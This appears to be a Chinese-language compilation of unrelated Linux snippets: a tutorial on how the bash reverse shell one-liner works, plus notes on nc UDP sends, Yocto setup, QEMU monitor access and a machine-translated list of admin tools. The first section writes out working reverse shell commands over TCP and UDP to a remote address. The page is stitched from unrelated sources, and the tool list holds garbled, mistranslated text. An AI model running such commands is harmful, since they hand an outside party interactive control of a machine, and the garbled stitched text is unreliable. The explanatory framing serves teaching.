1. 反弹shell基础
将这句话拆开来看, bash -i , >& , /dev/tcp/ , 0>&1 ,有三个知识点。
(1) bash -i 是打开一个交互的bash
(2) /dev/tcp/ 是linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
(3) >& 和 0>&1 这两个涉及到Linux文件描述符和重定向。此处的 & 是取地址符
(1)文件描述符
Linux启动时会默认打开三个文件描述符(实现文件读写操作),Linux把键盘、显示器等设备也当做文件用文件描述符进行控制,如果要修改默认设备就需要进行重定向。
(2)重定向
输入的重定向包括, < 和 << ,输出的重定向包括, > 和 >> , n< file 代表将文件描述符 n 重定向到file指代的文件(以只读方式打开),如果n省略就是0(标准输入)。同理如果是输出的重定向, n> file ,n省略则默认是1。
错误输出的重定向有三种形式
其中, &> 和 >& 是一个意思,都是将标准错误输出合并到标准输出中。 2>&1 和 >file 可以用如下过程图表示
需要注意的是,上述输入输出重定向,将输入和输出绑定到文件或者设备只对该条指令有效,如果想要一直有效,就需要添加exec指令 exec n </> file/n
(3)复制
与之形似的是文件描述符的复制 n<&m / n>&m ,这两个都是将文件描述符 n 复制到 m ,两者的区别是,前者是以只读的形式打开,后者是以写的形式打开,因为读/写方式对于复制操作几乎没有影响所以两者基本可以看作是等价的。这里的 & 目的是区分以数字为名字的文件和文件描述符的数值,如果没有 & 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件,而不是另一个文件描述符。
此时再来看这句命令,可与理解为,创建一个可交互的bash和一个到172.168.1.1:80的TCP链接,然后将bash的输入输出错误都重定向到在172.168.1.1:80监听的进程。
首先,反弹shell可以理解为,攻击者监听在TCP/UDP端口,被控制端的请求被转发到该端口,可以控制其输入输出。一般攻击者攻击了一台机器,并用自己的主机去连接该机器的端口,这是一种“正向连接”,远程桌面、web服务、ssh、telnet等都是正向连接的一种。但是如果被攻击的机器处于内网中可能造成无法连接,或者有防火墙等限制,再或者攻击者需要进行实时控制,正向连接是无法满足需要的。所以有了“反向连接”,即让被攻击的主机主动去连接攻击者的服务器。
所以我们还可以从反向连接的角度来理解一下 0>&1 。如果只是 bash -i >& /dev/tcp/172.168.1.1/80 ,将输出描述符连接到了端口,该端口可接收到我们的输出,即我们正向连接了被攻击者的机器,但是我们输入shell后是无法看到回显的。回显只会显示在被攻击者的机器上。如果我们想要得到回显,需要将被攻击机器的输入描述符连接到我们监听的端口上。
也就是说如果我们想要看到回显,除了先将输出描述符连接到端口上,还需要将其输入描述符也连接到端口上。即输入描述符0和输出描述符1连接相同, 0>&1 即可解决。这就形成了一个回路,实现了远程交互式shell的功能。
不过这样的一条指令还不够完善,因为这条指令会使得我们在被攻击的机器上依然能看到我们在攻击者机器中执行的指令,那么解决办法就是将错误输出和标准输出进行混合,即将 bash -i > 换为 bash -i >&
Bash相关shell主要有以下几种:
刚才详细讲的是第一种bash shell,第二种是将 >& 这种错误输出的混合方式改成了 2>&1 ,2代表错误输出,1代表标准输出,2指向了1,即输出混合了。文件描述符的复制 n<&m / n>&m 两种虽然读写不同但是对于shell的效果是等价的,即和 0>&1 效果相同。所以第二种就是第一种的变种。第四种同理,输入、输出、报错都定位到同一位置。第五种选了一个新的文件描述符196,道理类似。
对于第三种bash shell,exec已经在前面提到过可以持续连接,后面的关键点如下:
从文件中依次读取每一行,将其赋值给 line 变量(其他也可),之后在循环中对line进行操作。这里不再从文件中读取,而是通过管道符对攻击者机器上输入的命令进行依次执行,并且将标准输出和标准错误输出都重定向到了文件描述符5,也就是攻击机上,实现交互式shell的功能。
另外,本文最开始的时候说到/dev/tcp/是Linux中的一个特殊设备类似的还有/dev/udp/,按照tcp的方式直接改成udp就行。
sh -i >& /dev/udp/172.168.1.1/80 0>&1
除了bash还有很多其他借用第三方工具(nc、telnet、socat、xterm)或使用脚本语言(python、Perl、Ruby、Go、php、Lua、JAVA、gawk、Powershell)反弹shell的方式,这里就不一一列举了,原理类似。写这篇文章总结shell的过程中顺手将网络上的shell进行了收集,将近80条,写了BashShell.py,就是个简单的查询shell的工具,有需要的下方留言
2. linux怎么使用nc命令来发送一串使用udp协议的数据或者不是NC也可以的命令
echo -n “foo" | nc -4u -w1 <host> <udp port>
或者
echo -n "hello" >/dev/udp/localhost/8000
3. linux imx6ul 怎么去掉yocto进度条
1. 执行以下命令,安装如下软件
~# apt-get install gawk wget git-core diffstat unzip texinfo gcc-multilib build-essential chrpath socat
~# apt-get install u-boot-tools
~# apt-get install libsdl1.2-dev xterm sed cvs subversion coreutils texi2html docbook-utils python-pysqlite2 help2man make gcc g++ desktop-file-utils libgl1-mesa-dev libglu1-mesa-dev mercurial autoconf automake groff curl lzop asciidoc
2. 下载repo
~# mkdir ~/bin
~# curl http://php.webtutor.pl/en/wp-content/uploads/2011/09/repo > ~/bin/repo//获取repo
~# chmod a+x ~/bin/repo
~# export PATH=~/bin:$PATH
3. 初始化repo并git下源码,依据网速可能要一个小时左右
~# mkdir fsl_6dl_release
~# cd fsl_6dl_release
~/fsl_6dl_release# git config --global user.name "Your Name"
~/fsl_6dl_release# git config --global user.email "Your Email"
~/fsl_6dl_release# repo init -u git://git.freescale.com/imx/fsl-arm-yocto-bsp.git -b imx-3.14.28-1.0.0_ga
~/fsl_6dl_release# repo sync
至此基本环境搭建完毕。
4. 安装NFS
~$ sudo apt-get install nfs-kernel-server
~$ sudo mkdir /imx6
~$ sudo vi /etc/exports
最后一行添加:/imx6 *(rw,sync,no_root_squash,no_sub
4. QEMU Monitor 使用
从命令行启动qemu之后,按键 Ctrl-a c 可以进入monitor,之后可以执行很多有用的命令。具体可以参考 https://qemu.readthedocs.io/en/latest/system/monitor.html 。但是文档没有提到的是其他进入monitor的方式,尤其是想要同时有consel 和 monitor的情况。
查询手册的执行参数一章可以看到参数 -monitor dev 可以指定monitor使用什么字符设备输出。但是用法没给,而且必须使用字符设备也比较难用。
继续查询,这个回答很有帮助,提到如何开启网络端口做monitor: https://unix.stackexchange.com/questions/426652/connect-to-running-qemu-instance-with-qemu-monitor
再查阅手册,问题已经明白了。 dev设备 可以是很多形式,在执行参数 -serial dev 里面讲的很全面。 https://qemu.readthedocs.io/en/latest/system/invocation.html 。
而且这种灵活的使用方式不仅适用于monitor,也适用于 serial, 也就是能够很方便的把guest os的consel重定向到各种形式的接口上(包括 虚拟控制台,tty,网络,管道,文件等)。
QEMU的强大令人惊叹,回头看看这块源码怎么实现的。
这里给出具体参数,省去查找的麻烦:
qemu-system-aarch64 ... -monitor telnet:127.0.0.1:55555,server,nowait
使用telnet即可监听端口: telnet 127.0.0.1 55555
UNIX套接字为简单高效建立本地进程间通信的一种机制,接口和网络套接字一致,但是内部去掉了TCP/IP协议栈的繁琐流程,提高通信效率。相关说明: https://akae.github.io/book/ch37s04.html
QEMU参数为: -monitor unix:qemu-monitor-socket,server,nowait , qemu-monitor-socket为套接字名称,可以自定义。
使用socat连接: socat - unix-connext:qemu-monitor-socket 。 socat连接效果比telnet效果好。
socat工具十分强大,使用参考: http://brieflyx.me/2015/linux-tools/socat-introction/ 和 https://www.jianshu.com/p/54005e3095f3 。
5. 在地址为192.168.1.44的主机上,要检查到另一台主机的端到端连接性,可通过CLI执行哪个命令
ping:通过ICMP回应/回复报文检查远端主机的端到端连接性(RTT延时,抖动,丢包)。用来检查系统状态和可连接性很不错
.hping:网络扫描和检测工具,可以产生ICMP / TCP / UDP ping数据包。常常用于高级端口扫描,防火墙测 试验,手动MTU路径发现和碎片测试.traceroute
:通过TTL限定的ICMP / UDP / TCP侦测包来发现从本地主机到远端目标主机之间的第三层转发路径。用来调试网络连接性和
路由问题.mtr:traceroute的一个变种,能根据运行时统计数据整理出每一跳的包丢失/动作。用来评估路由路径延时很不错.netcat
/ socat:TCP / IP网络里的瑞士军刀,可以读/写TCP / UDP协议字节流。用来调试防火墙策略和服务可用性很不错.dig
:DNS调试工具,可以生成正向查询,反向查询,搜索域名服务器,检查CNAME,MX及其他DNS记录。可以在侦错的时候查询特定的DNS服务器.nslookup
:另外一个DNS检查/调试工具。支持所有DNS查询和记录。可以查询特定DNS服务器。
dnsyo:一个DNS测试工具,通过对全世界1500个不同网络中的大量开放解析器执行DNS查询来测试DNS传输.lsof
:显示进程打开的文件信息(例如,普通文件,管道或套接字)。用来监视网络连接很不错
.iftop:一个基于ncurses的命令行界面应用,可以实时监视各个网络物理接口上的网络连接和带宽占用。用来记录霸占带宽的应用,用户,目的地和端口等很不错
.netstat:一个网络统计工具,可以显示状态以及统计信息,当前网络连接(TCP / UDP端口,IP地址),路由表,TX / RX流量以及网络协议。用来做网络相关诊断和性能调试很不错
.tcpmp:一个常用的基于libpcap抓包库的包侦测工具。可以按伯克利包过滤器格式定义抓包条件
.tshark:另一个命令行抓包工具,和它的GUI版本Wireshark完全兼容。支持1000种协议而且这个列表还在增加。用来调试,分析和保存实时 。络封包信息很不错
的ip:。一个多功能的命令行网络工具,是iproute2的包的一部分可以检查和修改路由表,网络设备状态以及IP隧道设置用来查看路由表,增加/删除静态路由,配置网络接口,以及调试路由问题很有用.ifup
/ ifdown:用来激活和关闭特定的网络接口。经常用于重启整个网络服务.autossh
:一个能建立SSH连接并在断线后自动重新连接的程序。用来创建长时间保持的穿越严格企业网络的SSH隧道很有用.iperf
:一个网络测试工具,通过在发送自定义TCP / UDP数据流来衡量主机间双向最大吞吐量
.elinks / lynx:为基于命令行的服务器环境下使用的基于文字的网页浏览器。
安全工具
iptables的:一个用户空间下的命令行工具,用于配置Linux的内核防火墙可以创建和修改的Linux内核空间的网络包接收,转发和发送规则。
NMAP:一个常用的为了安全审查目的的端口扫描和网络发现
TCP包装:一个主机端的网络访问控制列表工具,可以过滤进入/出去的网络请求/ 工具。用来在本地网络回复经常配合iptables的一起使用,作为额外一层安全保护。
getfacl的说明书/ setfacl的:查看和定制文件和目录的访问控制列表,作为传统文件权限的扩展。
cryptsetup:用于创建和管理LUKS加密磁盘分区
lynis :一个命令行的漏洞扫描工具。可以扫描整个Linux系统,并汇报潜在的漏洞以及相关可能解决方案
.maldet:一个恶意软件扫描命令行工具,可以检测和隔离潜在的感染文件。可以在后台运行长期监 。
rkhunter / chkrootkit的:一个命令行工具,可以扫描本地系统里的潜在木马,隐藏后门和可疑利用,并禁用它们。
存储工具
的fdisk:一个磁盘分区编辑工具用于查看,创建和修改本地磁盘或可移动磁盘的分区
.sfdisk:fdisk的一个变种,能用一种非交互的方式访问或更新磁盘分区表。用来自动化备份和恢复过程中的磁盘分区很有用
.parted:另一个磁盘分区编辑器,支持超过2TB的磁盘的GPT(GUID分区表)格式.gparted是parted的一个前端GTK +图形界面.df
:用来查看不同分区或文件路径的已用/可用存储空间和挂载点。还有一个更易用的变种DFC。
:用来查看不同文件和目录的当前磁盘占用情况(例如, -sh *)。
mkfs:一个磁盘格式化命令,用来在独立磁盘分区上建立文件系统。有多个文件系统相关的版本:ext2,ext3,ext4,bfs,ntfs,vfat /
fat.fsck:一个命令行工具,用来检查文件系统错误并尝试可能的修复。通常在启动时自动运行,但是在卸载一个分区后也可以根据需要手动运行
.mount:用来映射一个物理磁盘分区,网络共享或远程存储到一个本地挂载点。任何对挂载点里的读/写操作都是对应实际存储的实际数据读/写
.mdadm :一个命令行工具,用来管理物理块设备上的软件RAID设备。可以创建,构造,增长或监视RAID阵列.lvm
:一套命令行工具集,用来管理卷分组和物理/逻辑卷,可以。用最小的停机时间在多个物理磁盘上创建,调整大小,状语从句:拆分合并卷
日志访问工具
尾:用来查看一个(长中的)日志文件的尾部有几个变种,包括multitail(多窗口查看)和ztail(支持的inotify和正则表达式过滤以及颜色)。
logrotate的:一个命令行工具,可以在根据设定的时间段拆分,压缩并通过邮件发送旧的/大的日志文件。用来管理可能产生大量日志文件的繁忙主机很有用.grep
/ egrep:可以通过特定的模式或正则表达式过滤日志内容。变种包括用户更友好的ack和速度更快的ag.awk
:一个多功能的文本扫描和处理工具。常用于从文本/日志文件中找出特定的列或内容,并输出给其他工具.sed
:一个文本流编辑工具,可以过滤和改变(例如,删除行/空格,替换/转换单词,增加计数)文本流并通过管道连接到标准输出/标准错误或者其他工具。
备份工具
rsync:一个快速的单向增量备份和镜像工具(常规于复制一个数据仓库到线下存储,可以选择通过SSH或stunnel的加密连接
.rdiff-backup :另一个有效利用带宽的增量备份工具.diplicity
:一个加密的增量备份工具。使用GnuPG加密备份,并通过SSH上传到远程服务器。
性能监视工具
top:一个命令行的进程查看程序。可以监视系统负载,进程状态,CPU和内存占用。有一个更易用的变种htop。ps
:显示系统所有运行中进程的一个快照。输出可以定制成显示PID,PPID,用户,负载,内存,积累的用户/系统时间,启动时间,以及更多。有一个变种pstree可以用树结构显示进程
.nethogs:一个带宽监视工具,按进程来分组显示活动网络连接,实时汇报 -个进程占用的(上传/下载)带宽
.ngxtop:一个网页 服务器访问日志解析和监视工具,界面受到了top命令启发。它可以实时汇报整理过的页面请求列表,包括频率,大小,HTTP返回值,IP地址,等等.vmstat
:一个简单的命令行工具,可以显示多个实时系统特征,例如进程数,剩余内存,分页状态,CPU占用,块设备I / O活动,中断/上下文切换统计,
等等.iotop:一个基于ncurses的I / O监视工具,可以实时排序显示所有运行中进程的磁盘I / O活动
.iostat:一个命令行工具,可以汇报当前CPU使用情况,以及设备I / O使用情况,这里的I / O使用情况(例如,块传输速度,字节读/写速度)是按设备或分区来汇报的。
效率工具
screen:用来把一个单一的终端拆分成多个持久的虚拟终端,也支持远程用户访问,类似teamviewer的屏幕分享功能
.tmux:另一个终端复用工具,可以支持多个长期会话,还可以横向/纵向拆分终端。
作弊:一个简单的命令行工具,可以让你查看多个常用Linux命令的备记录,就在手边非常方便。内建的备忘录也可以完全定制.apropos
:用来在帮助手册里查找描述或关键字很有用。
包管理工具
apt:基于Debian系统的事实上的包管理工具,例如Debian,Ubuntu或Backtrack。一个救生圈.apt
-fast:apt-get的一个支撑应用,可以通过多个并行连接明显提高apt-get的下载速度
.apt-file:用来查看某个特定文件属于哪个.deb包,或者显示一个特定.deb包里的所有文件。已安装和未安装的包都能支持
.dpkg:一个用来手动安装.deb包的命令行工具。强烈建议尽可能的使用apt.yum
:用于基 于红帽的系统的自动包管理工具,比如RHEL,CentOS或Fedora。这是另一个救生圈!
rpm:通常我都是使用rpm来配合yum使用。有很多有用的参数,比如-q,-f, -l可以分别用来查询,指定文件和路径。
硬件工具
lspci的:一个命令行工具,可以显示已安装的PCI设备的各种信息,比如型号名称,设备驱动,设备功能,内存地址,PCI总线地址。
lshw:一个命令行工具,可以查询和显示不同分类下的硬件配置的详细信息(例如,处理器,内存,主板,网络,存储)支持多重输出格式:HTML,XML,JSON文本。
inxi:一个综合硬件查看工具,可以提供不同硬件模块的总览,例如CPU,显卡,声卡,网卡,温度/风扇传感器,等等。